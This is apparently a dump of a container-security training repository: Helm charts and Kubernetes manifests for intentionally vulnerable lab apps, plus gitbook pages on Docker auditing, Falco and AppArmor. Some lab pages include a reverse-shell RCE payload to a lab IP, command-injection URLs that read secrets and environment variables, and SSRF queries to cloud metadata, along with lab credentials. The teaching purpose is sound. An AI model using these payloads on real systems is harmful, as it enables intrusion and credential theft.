.Values.service.port }}'] 18 | restartPolicy: Never 19 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/templates/service.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: {{ include "server-health.fullname" . }} 5 | labels: 6 | app.kubernetes.io/name: {{ include "server-health.name" . }} 7 | helm.sh/chart: {{ include "server-health.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | spec: 11 | type: {{ .Values.service.type }} 12 | ports: 13 | - port: {{ .Values.service.port }} 14 | targetPort: http 15 | protocol: TCP 16 | name: http 17 | selector: 18 | app.kubernetes.io/name: {{ include "server-health.name" . }} 19 | app.kubernetes.io/instance: {{ .Release.Name }} 20 | -------------------------------------------------------------------------------- /gitbook/advanced-concepts/portainer.md: -------------------------------------------------------------------------------- 1 | # Portainer 2 | 3 | Portainer is a simple management solution for Docker. Easily manage your Docker hosts and Docker Swarm clusters via Portainer web user interface. 4 | 5 | * Run portainer using the below command 6 | 7 | ```bash 8 | docker run -d -p 9000:9000 --name portainer \ 9 | --restart always -v /var/run/docker.sock:/var/run/docker.sock \ 10 | -v /opt/portainer:/data portainer/portainer 11 | ``` 12 | 13 | ![run portainer](images/run-portainer.png) 14 | 15 | * Now you can access portianer at http://STUDENTVMIP:9000 16 | 17 | ![portainer setup](images/portainer-setup.png) 18 | 19 | ![portainer setup](images/portainer-select.png) 20 | 21 | ![Portainer Dashboard](images/portainer-dashboard.png) -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/templates/tests/test-connection.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: "{{ include "connectivity-check.fullname" . }}-test-connection" 5 | labels: 6 | app.kubernetes.io/name: {{ include "connectivity-check.name" . }} 7 | helm.sh/chart: {{ include "connectivity-check.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | annotations: 11 | "helm.sh/hook": test-success 12 | spec: 13 | containers: 14 | - name: wget 15 | image: busybox 16 | command: ['wget'] 17 | args: ['{{ include "connectivity-check.fullname" . }}:{{ .Values.service.port }}'] 18 | restartPolicy: Never 19 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/templates/service.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: {{ include "mailbox-service.fullname" . }} 5 | labels: 6 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 7 | helm.sh/chart: {{ include "mailbox-service.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | spec: 11 | type: {{ .Values.service.type }} 12 | ports: 13 | - port: {{ .Values.service.port }} 14 | targetPort: http 15 | protocol: TCP 16 | name: http 17 | selector: 18 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 19 | app.kubernetes.io/instance: {{ .Release.Name }} 20 | -------------------------------------------------------------------------------- /gitbook/kubeaudit/readme.md: -------------------------------------------------------------------------------- 1 | # Running kubeaudit 2 | 3 | kubeaudit is a command line tool to audit Kubernetes clusters for various different security concerns: 4 | * run the container as a non-root user 5 | * use a read only root filesystem 6 | * drop scary capabilities 7 | * don't add new ones 8 | * don't run privileged 9 | * etc. 10 | 11 | ## How to run kubeaudit 12 | 13 | * Running the `kubeaudit` with all checks 14 | 15 | ```bash 16 | cd /data/kubeaudit 17 | ./kubeaudit all 18 | ``` 19 | 20 | ![](images/kubeaudit.png) 21 | 22 | 23 | > We can also use `kubeaudit` to fix vulnerabilities in a live cluster `*Not recommended for production` 24 | 25 | ### References 26 | 27 | * [https://github.com/Shopify/kubeaudit](https://github.com/Shopify/kubeaudit) -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/templates/service.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: {{ include "connectivity-check.fullname" . }} 5 | labels: 6 | app.kubernetes.io/name: {{ include "connectivity-check.name" . }} 7 | helm.sh/chart: {{ include "connectivity-check.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | spec: 11 | type: {{ .Values.service.type }} 12 | ports: 13 | - port: {{ .Values.service.port }} 14 | targetPort: http 15 | protocol: TCP 16 | name: http 17 | selector: 18 | app.kubernetes.io/name: {{ include "connectivity-check.name" . }} 19 | app.kubernetes.io/instance: {{ .Release.Name }} 20 | -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/docker-integrity-check.md: -------------------------------------------------------------------------------- 1 | # Docker integrity check for containers 2 | 3 | * We can list the changed files and directories in a containers filesystem 4 | * There are 3 events that are listed in the diff 5 | * A - Add 6 | * D - Delete 7 | * C - Change 8 | 9 | 10 | ## Demonstration 11 | 12 | * Let's run a ubuntu container and perform some changes 13 | 14 | ```bash 15 | docker run --name checkintegriy -it ubuntu:latest bash 16 | mkdir -p /data/output 17 | echo "modifed this stuff" > /.dockerenv 18 | exit 19 | ``` 20 | 21 | ![docker perfrom changes](images/docker-perform-changes.png) 22 | 23 | * Now lets see the diff using the following command 24 | 25 | ```bash 26 | docker diff checkintegriy 27 | ``` 28 | 29 | ![](images/docker-diff-changes.png) -------------------------------------------------------------------------------- /gitbook/docker-events/README.md: -------------------------------------------------------------------------------- 1 | # Docker Events 2 | 3 | Docker events generates real time events from the server. 4 | 5 | 6 | * Looking for the global events generated by the docker runtime 7 | 8 | ```bash 9 | docker system events 10 | ``` 11 | 12 | ![docker system events](images/docker-system-events.png) 13 | 14 | 15 | * Filter events based on time 16 | 17 | ```bash 18 | docker events --since '10m' 19 | ``` 20 | 21 | * Filter events based on images image 22 | 23 | ```bash 24 | docker events --filter 'image=alpine' 25 | ``` 26 | 27 | * Filter events based on 28 | 29 | ```bash 30 | docker events --filter 'event=stop' 31 | ``` 32 | 33 | ### References 34 | 35 | * [docker events](https://docs.docker.com/engine/reference/commandline/events/) 36 | * [Using docker events with code](http://crosbymichael.com/docker-events.html) -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/amicontained.md: -------------------------------------------------------------------------------- 1 | # amicontained 2 | 3 | This is a container introspection tool that lets you find out what container runtime is being used as well as the features available. 4 | 5 | * Docker container running with no privileges 6 | 7 | ```bash 8 | docker run --rm -it r.j3ss.co/amicontained -d 9 | ``` 10 | 11 | ![docker no privileges](images/docker-no-privileges.png) 12 | 13 | * Docker container running with host privileges 14 | 15 | ```bash 16 | docker run --rm -it --pid host r.j3ss.co/amicontained -d 17 | ``` 18 | 19 | ![docker host privileges](images/docker-host-privileges.png) 20 | 21 | * Docker container running with apparmor profile security options 22 | 23 | ```bash 24 | docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained -d 25 | ``` 26 | 27 | ![docker apparmor profile](images/docker-apparmor-profile.png) -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/docker-runtime-endpoints.md: -------------------------------------------------------------------------------- 1 | # Auditing Docker Runtime and Endpoints 2 | 3 | * Checking for the docker daemon configuration 4 | 5 | ```bash 6 | docker system info 7 | ``` 8 | 9 | ![docker system info](images/docker-system-info.png) 10 | 11 | * Checking for the docker API exposed on `0.0.0.0` 12 | 13 | ```bash 14 | sudo cat /lib/systemd/system/docker.service 15 | ``` 16 | 17 | ![docker using tcp socket](images/docker-tcp-socket.png) 18 | 19 | * Checking if the docker socket is mounted to any running container 20 | 21 | ```bash 22 | docker inspect | grep -i '/var/run/' 23 | ``` 24 | 25 | ![docker inspect for socket](images/docker-inspect-for-socket.png) 26 | 27 | * Checking other files and data related to docker 28 | 29 | ```bash 30 | sudo ls -l /var/lib/docker/ 31 | ``` 32 | 33 | ![docker system files and data](images/docker-data-files.png) -------------------------------------------------------------------------------- /gitbook/getting-started/vuln-apps.md: -------------------------------------------------------------------------------- 1 | # Vulnerable Apps 2 | 3 | Each student cluster has intentionally vulnerable apps running which will be used during lab scenarios. The apps are available in following URLs 4 | 5 | ``` 6 | http://mailbox-service.oss-k8s-security.cloudsec.training 7 | http://server-health.oss-k8s-security.cloudsec.training 8 | http://connectivity-check.oss-k8s-security.cloudsec.training 9 | ``` 10 | 11 | **NOTE:** All attacks described in this document must be executed from Kubernetes Student VM. 12 | 13 | The apps are accessible from Student VM after you setup port forward locally. Open a terminal in Student VM and execute the command below to setup a port forward into the cluster. 14 | 15 | ``` 16 | sudo kubectl port-forward -n kube-system svc/nginx-ingress-controller 80:80 17 | ``` 18 | 19 | Now you can navigate to the vulnerable applications by URL given above. -------------------------------------------------------------------------------- /infra-setup/apps-ingress/apps-ingress.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: extensions/v1beta1 2 | kind: Ingress 3 | metadata: 4 | name: apps-ingress 5 | annotations: 6 | kubernetes.io/ingress.class: nginx 7 | nginx.ingress.kubernetes.io/rewrite-target: / 8 | spec: 9 | rules: 10 | - host: mailbox-service.oss-k8s-security.cloudsec.training 11 | http: 12 | paths: 13 | - path: / 14 | backend: 15 | serviceName: mailbox-service 16 | servicePort: 80 17 | - host: server-health.oss-k8s-security.cloudsec.training 18 | http: 19 | paths: 20 | - path: / 21 | backend: 22 | serviceName: server-health 23 | servicePort: 80 24 | - host: connectivity-check.oss-k8s-security.cloudsec.training 25 | http: 26 | paths: 27 | - path: / 28 | backend: 29 | serviceName: connectivity-check 30 | servicePort: 80 31 | -------------------------------------------------------------------------------- /gitbook/scenario-1/scenario.md: -------------------------------------------------------------------------------- 1 | # Exploiting Private Registry via Misconfiguration - Scenario 2 | 3 | Bob's company has deployed a new mail application for them to use. Alas, this application is riddled with bugs! Most of which arise from default configurations and poor programming practices. There has been speculation that the internal team did not even remove the readme file for this application! 4 | 5 | In any case, as an attacker you know that the application is deployed using docker. Can we use a vulnerability to read files that we are not meant to and see what the docker private registry looks like? Who knows what secrets you may find! 6 | 7 | ## Tips 8 | 9 | * Endpoint for your attack is `http://mailbox-service.student-uniquename.cloudsec.training`. Replace `uniquename` with your unique name 10 | * The login credentials for the application are `username: bob` and `password: bobmailbox` 11 | * `README.md` exists 12 | * The app is vulnerable to `LFI` -------------------------------------------------------------------------------- /infra-setup/secrets-db-service/secrets-db-service.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Namespace 3 | metadata: 4 | name: database 5 | --- 6 | apiVersion: v1 7 | kind: Service 8 | metadata: 9 | namespace: database 10 | name: secrets-db-service 11 | spec: 12 | ports: 13 | - protocol: TCP 14 | port: 3306 15 | targetPort: 3306 16 | selector: 17 | app: secrets-db 18 | --- 19 | apiVersion: apps/v1 20 | kind: Deployment 21 | metadata: 22 | namespace: database 23 | name: secrets-db-deployment 24 | labels: 25 | app: secrets-db 26 | spec: 27 | selector: 28 | matchLabels: 29 | app: secrets-db 30 | template: 31 | metadata: 32 | labels: 33 | app: secrets-db 34 | spec: 35 | containers: 36 | - name: secrets-db 37 | image: mysql:5.7 38 | env: 39 | - name: MYSQL_ROOT_PASSWORD 40 | value: "secret" 41 | ports: 42 | - containerPort: 3306 43 | 44 | -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/scenario.md: -------------------------------------------------------------------------------- 1 | # Attacking insecure volume mounts - Scenario 2 | 3 | In this scenario we will be exploiting a NodeJS application using remote code execution to gain a reverse shell. Then we will use the volume mounted `docker.sock` to gain privileges in the host system with docker runtime. 4 | 5 | * The application is running at CTF VM. You can access it by navigating to `http://CTFVMIP` 6 | 7 | ![node app home page](images/insecure-mount-node-app.png) 8 | 9 | * This NodeJS application is vulnerable to remote code execution (RCE) in `q` GET parameter. Access the endpoint using `http://CTFVMIP/?q="docker"` 10 | 11 | ![vulnerable parameter](images/insecure-mount-vulnerable-parameter.png) 12 | 13 | * To exploit this RCE, we will be using below payload. Here `192.168.56.3` need to replace with your student VM IP 14 | 15 | ```bash 16 | require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/192.168.56.3/5555 0>%261"') 17 | ``` -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/README.md: -------------------------------------------------------------------------------- 1 | # Attacking Docker Containers - Scenarios 2 | 3 | In this section we will be attacking the containers to gain access to the host system, data and assets. 4 | 5 | * Attacking contianer capabilities 6 | * Attacking insecure volume mounts in containers 7 | * Attacking runtime misconfigurations 8 | * Exploiting docker secrets misconfiguration 9 | 10 | `Docker Escape` is the term used to define vulnerabilities, weaknesses and their exploitation technique that allows an attacker to bypass the various restrictions enforced by the container runtime. 11 | 12 | An escape happens when an attacker having access to execute arbitrary command inside a container is able to access or execute commands on the host system, outside the container namespace restrictions. 13 | 14 | > For this section, we assume that an attacker has already gained access to execute commands inside a container by exploiting some vulnerability in app deployed in the container. -------------------------------------------------------------------------------- /gitbook/scenario-3/scenario.md: -------------------------------------------------------------------------------- 1 | # Testing for the sensitive configurations and secrets in Kubernetes cluster - Scenario 2 | 3 | Bob's company has deployed their code base to production Kubernetes cluster. Alas, this application has secrets which gives access to their AWS Cloud and other API endpoints! Most of which arise from default configurations, misconfigurations and bad programming practices. There has been speculation that the team directly deploys code from version control system to production! 4 | 5 | In any case, as an attacker you know that the application is deployed in Kubernetes, which contains secrets to access the different cloud provider, API endpoints. Who knows what all secrets you may find! 6 | 7 | ## Tips 8 | 9 | * Execute below command to start a shell into the pod to get started 10 | 11 | ```bash 12 | export CODEBASE_POD_NAME=$(kubectl get pods --selector app=code-base -o jsonpath="{.items[0].metadata.name}") 13 | kubectl exec -it $CODEBASE_POD_NAME sh 14 | ``` -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/docker-bench-security-audit.md: -------------------------------------------------------------------------------- 1 | # Docker Bench Security Audit 2 | 3 | Docker Bench for Security is a shell script to perform multiple checks against the Docker container environment. It will give a detailed view of the security configuration based on CIS benchmarks. This script supports most of the Unix operating systems as it was built based on the POSIX 2004 compliant. 4 | 5 | More details about the tool information can be found at https:/​/github.​com/​docker/docker-​bench-​security 6 | 7 | The following are the high-level areas of checks this script will perform 8 | 9 | * Host configuration 10 | * Docker daemon configuration and files 11 | * Docker container images 12 | * Docker runtime 13 | * Docker security operations 14 | * Docker swarm configuration 15 | 16 | 17 | ## Running docker bench security 18 | 19 | Now lets perform the audit 20 | 21 | ```bash 22 | cd /opt/docker-bench-security 23 | sudo bash docker-bench-security.sh 24 | ``` 25 | 26 | ![Docker Bench Security](images/docker-bench-security.png) -------------------------------------------------------------------------------- /gitbook/demos/cve-2019-5736.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-5736 - Escape from Docker and Kubernetes containers to root on host 2 | 3 | This scenario demos has been taken from [https://github.com/Frichetten/CVE-2019-5736-PoC](https://github.com/Frichetten/CVE-2019-5736-PoC). Thanks to [Nick Frichette](https://frichetten.com/) 4 | 5 | This is a Go implementation of CVE-2019-5736, a container escape for Docker. The exploit works by overwriting and executing the host systems runc binary from within the container. 6 | 7 | ## How does the exploit work? 8 | 9 | ![](images/CVE-2019-5736_1.gif) 10 | 11 | ## Example of malicious Docker image 12 | 13 | ![](images/CVE-2019-5736_2.gif) 14 | 15 | 16 | ### References 17 | 18 | * [CVE-2019-5736: runc container breakout exploit code](https://www.openwall.com/lists/oss-security/2019/02/13/3) 19 | * [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) 20 | * [CVE-2019-5736-PoC](https://github.com/Frichetten/CVE-2019-5736-PoC) -------------------------------------------------------------------------------- /gitbook/popular-attacks/cryptojacking.md: -------------------------------------------------------------------------------- 1 | # Cryptojacking using public docker containers 2 | 3 | Kromtech Security Center found 17 malicious docker images stored on Docker Hub for an entire year. Even after several complaints on GitHub and Twitter, research made by sysdig.com and fortinet.com, cybercriminals continued to enlarge their malware armory on Docker Hub. With more than 5 million pulls, the `docker123321` registry is considered a springboard for cryptomining containers. Today’s growing number of publicly accessible misconfigured orchestration platforms like Kubernetes allows hackers to create a fully automated tool that forces these platforms to mine Monero. By pushing malicious images to a Docker Hub registry and pulling it from the victim’s system, hackers were able to mine `544.74` Monero, which is equal to `$90000`. 4 | 5 | 6 | * Read more about [Cryptojacking invades cloud. How modern containerization trend is exploited by attackers](https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers) -------------------------------------------------------------------------------- /gitbook/exploiting-cluster-secrets/solution.md: -------------------------------------------------------------------------------- 1 | # Exploiting Cluster Secrets 2 | 3 | * The application running in the CTF VM has code execution vulnerability `http://CTFVMIP:8080/?domain=;id` and is running in docker swarm as service with attached secrets 4 | 5 | ![accessing the docker swarm app](images/access-docker-swarm-app.png) 6 | 7 | * We can access the application container's environment variables using the `printenv` command by visiting `http://CTFVMIP:8080/?domain=;printenv` 8 | 9 | ![access docker swarm environment variables](images/access-docker-swarm-env.png) 10 | 11 | * We can explore the directories further `http://CTFVMIP:8080/?domain=;ls -l /run/` 12 | 13 | ![docker swarm app search locations](images/docker-swarm-search-locations.png) 14 | 15 | * The secrets are mounted via `docker secrets` at `/var/run/` or `/run/`. We can access them by visiting `http://CTFVMIP:8080/?domain=;cat /run/secrets/data_api_key` 16 | 17 | ![docker secret access data](images/docker-secrets-default-location.png) 18 | 19 | * A similar approach can be user for `docker swarm` and `kubernetes` cluster environments 20 | -------------------------------------------------------------------------------- /MIT-LICENSE.txt: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) [2020] [Appsecco Ltd.] 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /gitbook/scenario-2/solution.md: -------------------------------------------------------------------------------- 1 | # Attacking Kubernetes cluster Metadata using application SSRF vulnerability - Solution 2 | 3 | * Navigate to the application `http://server-health.student-uniquename.cloudsec.training` 4 | 5 | * Login to the application using `username: serveradmin` and `password: monitorworld` 6 | 7 | ![](images/app-login.png) 8 | 9 | * The application supports functionality to check server health. Let's give `https://icanhazip.com` to check the public IP address 10 | 11 | ![](images/check-ip.png) 12 | 13 | * As this setup is running on GCP, we can query the internal metadata using the standard endpoint `http://169.254.169.254/computeMetadata/v1/` 14 | 15 | ![](images/internal-metadata.png) 16 | 17 | * Similarly we can query all the sensitive information, including the Kubernetes secrets and other information related to Cloud Platform `http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env` 18 | 19 | ![](images/kube-env-metadata.png) 20 | 21 | * Also, we can find the flag by `http://169.254.169.254/computeMetadata/v1/instance/attributes/flag` 22 | 23 | ```bash 24 | 59a4c760306d682ca75d690bebb9db0e 25 | ``` 26 | 27 | ![](images/flag-metadata.png) -------------------------------------------------------------------------------- /gitbook/docker-logging/README.md: -------------------------------------------------------------------------------- 1 | # Docker Logging 2 | 3 | The `docker logs` command shows information logged by a running container. The `docker service logs` command shows information logged by all containers participating in a service. The information that is logged and the format of the log depends almost entirely on the container's endpoint command. 4 | 5 | ## Examples 6 | 7 | * Fetch the logs of a container 8 | 9 | ```bash 10 | docker logs containername 11 | 12 | # follow the stream 13 | docker logs -f containername 14 | ``` 15 | 16 | * Retrieve logs until a specific point in time 17 | 18 | ```bash 19 | docker run --name testlogs -d ubuntu sh -c "while true; do $(echo date); sleep 1; done" 20 | 21 | date 22 | Mon Oct 1 17:12:27 IST 2018 23 | 24 | docker logs -f --until=2s testlogs 25 | Mon Oct 1 11:41:36 UTC 2018 26 | Mon Oct 1 11:41:37 UTC 2018 27 | Mon Oct 1 11:41:38 UTC 2018 28 | ``` 29 | 30 | ![docker logs with filters](images/docker-logs-with-filters.png) 31 | 32 | ### Reference 33 | 34 | * [docker logs](https://docs.docker.com/v17.12/engine/reference/commandline/logs/) 35 | * [Logging with Docker](https://medium.com/@yoanis_gil/logging-with-docker-part-1-b23ef1443aac) -------------------------------------------------------------------------------- /gitbook/scenario-5/scenario.md: -------------------------------------------------------------------------------- 1 | # Attacking applications in different namespaces in Kubernetes cluster - Scenario 2 | 3 | Bob's friend in IT, Kevin manages the Kubernetes cluster for his company along with his teammate James. It's a little sad, but Kevin and James do not share their work with each other. 4 | 5 | It turns out James has setup a MySQL server on the same Kubernetes cluster but on a different namespace. But given that they are both on the same Kubernetes cluster, they appear to be on the same network! Well that is because, most Kubernetes clusters are setup without network segregation between namespaces. 6 | 7 | Can you help Kevin gain access to James' MySQL server to see what shady secrets he has been hiding? 8 | 9 | ## Tips 10 | 11 | By default, Kubernetes does not restrict traffic between pods running inside the cluster. This means any pod can connect to any other pod as there are no firewalls controlling the intra-cluster traffic. 12 | 13 | * Executing below commands to into the pod to get started 14 | 15 | ```bash 16 | export NET_TOOLS_POD=$(kubectl get pods --selector app=net-tools -o jsonpath="{.items[0].metadata.name}") 17 | kubectl exec -it $NET_TOOLS_POD bash 18 | ``` -------------------------------------------------------------------------------- /gitbook/advanced-concepts/docker-volumes.md: -------------------------------------------------------------------------------- 1 | # Docker Volumes 2 | 3 | > A volume is a designated directory in a container, which is designed to persist data, independent of the container's life cycle 4 | 5 | * Volume changes are excluded when updating an image 6 | * Persist when a container is deleted 7 | * Can be mapped to a host folder 8 | * Can be shared between containers 9 | 10 | 11 | ### Mount a Volume 12 | 13 | * Volumes are mounted when creating or executing a container 14 | * Can be mapped to a host directory 15 | * Volume paths specified must be absolute 16 | 17 | Execute a new container and map the /data/src folder from the host into the /test/src folder in the container 18 | 19 | ``` 20 | $ docker run -i -t -v /data/src:/test/src nginx:alpine sh 21 | ``` 22 | 23 | * Create some files and see the changes in host operating system 24 | 25 | ### Use of volumes 26 | 27 | * De-couple the data that is stored from the container which created the data 28 | * Good for sharing data between containers 29 | * Can setup a data containers which has a volume you mount in other containers 30 | * Mounting folders from the host is good for testing purposes but generally not recommended for production use 31 | -------------------------------------------------------------------------------- /gitbook/extra/lsm.md: -------------------------------------------------------------------------------- 1 | # LSM 2 | 3 | The Linux Security Module (LSM) framework provides a mechanism for various security checks to be hooked by new kernel extensions. 4 | 5 | The primary users of the LSM interface are Mandatory Access Control (MAC) extensions which provide a comprehensive security policy. Examples include SELinux, Smack, Tomoyo, and AppArmor. 6 | 7 | ## LSM Demonstration 8 | 9 | * Let's run a simple nginx container 10 | 11 | ```bash 12 | docker run --rm -it --name lsm-before -p 4321:80 nginx bash 13 | 14 | sh 15 | dash 16 | bash 17 | ``` 18 | 19 | ![lsm before nginx](images/lsm-before.png) 20 | 21 | 22 | * Now lets apply the apparmor profile for the container and see if we can perform other operations like `sh` and `dash` 23 | 24 | ```bash 25 | cd /opt/docker-nginx 26 | 27 | sudo bane sample.toml 28 | 29 | docker run --rm -it --name lsm-after \ 30 | --security-opt="apparmor:docker-nginx-sample" -p 4320:80 nginx bash 31 | 32 | sh 33 | dash 34 | bash 35 | ``` 36 | 37 | ![lsm after nginx](images/lsm-after.png) 38 | 39 | 40 | * Have a look at `cat /opt/docker-nginx/docker-nignx-sample` file for the apparmor profile that was created using [bane](https://github.com/genuinetools/bane) -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/docker-management.md: -------------------------------------------------------------------------------- 1 | # Docker Management 2 | 3 | There are different commands which will be very handy while using and managing docker containers. 4 | 5 | ## Inspecting container or image 6 | 7 | * Returns low-level information on Docker objects 8 | 9 | ```bash 10 | docker inspect 11 | docker inspect 12 | ``` 13 | 14 | * Let's inspect the `nginx:alpine` image 15 | 16 | ```bash 17 | docker inspect nginx:alpine 18 | ``` 19 | 20 | ![docker inspect nginx](images/docker-inspect-nginx.png) 21 | 22 | ## Docker history 23 | 24 | * Show the history of an image 25 | 26 | ``` 27 | docker history jess/htop 28 | ``` 29 | 30 | ![docker history](images/docker-history.png) 31 | 32 | ## Stoping and remove container 33 | 34 | * Let's run a nginx container 35 | 36 | ```bash 37 | docker run --name dummynginx -d nginx:alpine 38 | ``` 39 | 40 | * Identify the container name or id using `docker ps` 41 | 42 | ```bash 43 | docker stop dummynginx 44 | ``` 45 | 46 | * To remove container, it has to be stopped. Then runt he below command 47 | 48 | ```bash 49 | docker rm dummynginx 50 | ``` 51 | 52 | ![docker stop and remove](images/docker-stop-and-remove.png) 53 | -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/docker-volumes-networks.md: -------------------------------------------------------------------------------- 1 | # Auditing Docker Volumes and Networks 2 | 3 | ## Listing and inspecting the docker volumes 4 | 5 | * Listing docker volumes 6 | 7 | ```bash 8 | docker volume ls 9 | ``` 10 | 11 | ![docker volume ls](images/docker-volume-ls.png) 12 | 13 | * Inspecting docker volumes 14 | 15 | ```bash 16 | docker volume inspect wordpress_db_data 17 | ``` 18 | 19 | ![docker volume inspect](images/docker-volume-inspect.png) 20 | 21 | * Volumes can be used with Ready-Only, Read-Write modes 22 | 23 | 24 | ## Listing and inspecting the docker networks 25 | 26 | * Docker by default creates it's own networking namespace when we use Docker Swarm or Docker Compose 27 | 28 | * By default bridge, host, null networking options are available 29 | 30 | * Listing the docker networks 31 | 32 | ```bash 33 | docker network ls 34 | ``` 35 | 36 | ![docker network ls](images/docker-network-ls.png) 37 | 38 | * Inspecting the docker network 39 | 40 | ```bash 41 | docker inspect wordpress_default 42 | ``` 43 | 44 | ![docker network inspect](images/docker-network-inspect.png) 45 | 46 | 47 | > We can use our traditional toolset like `nmap` (or) `nc` for performing scans and information gathering -------------------------------------------------------------------------------- /gitbook/extra/exploiting-cluster-secrets.md: -------------------------------------------------------------------------------- 1 | # Exploiting Cluster Secrets 2 | 3 | In this scenario we will see how we will exploit an application to access docker swarm cluster secrets. 4 | 5 | 6 | * The application running in the CTF VM has code execution vulnerability `http://CTFVMIP:8080/?domain=;id` and is running in docker swarm as service with attached secrets 7 | 8 | ![accessing the docker swarm app](images/access-docker-swarm-app.png) 9 | 10 | * We can access the application container's environment variables using the `printenv` command by visiting `http://CTFVMIP:8080/?domain=;printenv` 11 | 12 | ![access docker swarm environment variables](images/access-docker-swarm-env.png) 13 | 14 | * We can explore the directories further `http://CTFVMIP:8080/?domain=;ls -l /run/` 15 | 16 | ![docker swarm app search locations](images/docker-swarm-search-locations.png) 17 | 18 | * The secrets are mounted via `docker secrets` at `/var/run/` or `/run/`. We can access them by visiting `http://CTFVMIP:8080/?domain=;cat /run/secrets/data_api_key` 19 | 20 | ![docker secret access data](images/docker-secrets-default-location.png) 21 | 22 | * A similar approach can be user for `docker swarm` and `kubernetes` cluster environements 23 | -------------------------------------------------------------------------------- /gitbook/scenario-4/scenario.md: -------------------------------------------------------------------------------- 1 | # Docker escape using Pod Volume Mounts to access the nodes and host systems - Scenario 2 | 3 | Bob's company has a lot of helpful applications for their IT admins. The same developers who built the Server Health Check application, also built a "Connectivity check" application. Well, they obviously re-used the code (who doesn't!) leading to an interesting vulnerability. 4 | 5 | Instead of making a web request now, this application makes ping requests to a server that Bob specifies. And we all know the quickest way to make a ping request is to execute the `ping` command. 6 | 7 | Web applications that execute OS commands using user input can fall prey to OS command injection vulnerabilities which would allow an attacker (our dear Bob in this case) to execute any accesible OS command through the user input fields. Oh and it's even more exciting if this application is running on docker! 8 | 9 | Let's hack this box and see where we can go from here :) 10 | 11 | ## Tips 12 | 13 | * Endpoint for your attack is `http://connectivity-check.student-uniquename.cloudsec.training`. Replace `uniquename` with your unique name 14 | * Login to the application using `username: sysadmin` and `password: superpowers` -------------------------------------------------------------------------------- /gitbook/sysdig-faclo/README.md: -------------------------------------------------------------------------------- 1 | # Sysdig Falco 2 | 3 | Sysdig Falco is an open source container runtime security. It is a behavioral monitoring software designed to detect anomalous activity. Sysdig Falco works as a intrusion detection system on any Linux host, although it is particularly useful when using Docker since it supports container-specific context like `container.id`, `container.image` or `namespaces` for its rules. 4 | 5 | ## Sysdig Falco Logging for Containers 6 | 7 | * Run the following command in student VM 8 | 9 | ```bash 10 | sudo falco 11 | ``` 12 | ![start sysdig falco](images/sysdig-falco-start.png) 13 | 14 | * Then start another container and perform operations like executing shell, reading shadow file, etc. 15 | 16 | ```bash 17 | docker exec -it registry sh 18 | cat /etc/passwd 19 | cat /etc/shadow 20 | ``` 21 | ![Running the container and commands](images/container-and-commands.png) 22 | 23 | ## Falco attack detection based on ruleset 24 | 25 | ![faclo detection](images/falco-detection.png) 26 | 27 | ## Play with Sysdig Falco Scenario 28 | 29 | ![Sysdig Faclo Scenario](images/sysdig-falco-scenario.png) 30 | 31 | [Sysdig Falco: Container security monitoring](https://www.katacoda.com/mateobur/scenarios/falco) -------------------------------------------------------------------------------- /gitbook/apparmor-nginx-profile/README.md: -------------------------------------------------------------------------------- 1 | # LSM - Apparmor Nginx Profile 2 | 3 | The Linux Security Module (LSM) framework provides a mechanism for various security checks to be hooked by new kernel extensions. 